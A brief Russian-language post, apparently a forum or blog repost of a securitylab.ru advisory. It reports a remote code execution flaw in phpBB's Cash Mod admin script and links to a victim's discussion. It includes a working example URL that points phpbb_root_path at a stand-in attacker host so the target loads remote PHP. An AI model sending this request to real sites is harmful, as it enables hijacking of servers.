Серьезная дырища обнаружена в скрипте форума phpBB.
Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.
Уязвимость обнаружена в файле \'/admin/admin_cash.php\'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:
http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/
источник:
http://www.securitylab.ru/49563.htmlА тут репортаж с места событий (жертвы):
http://dirty.ru/comments/19609
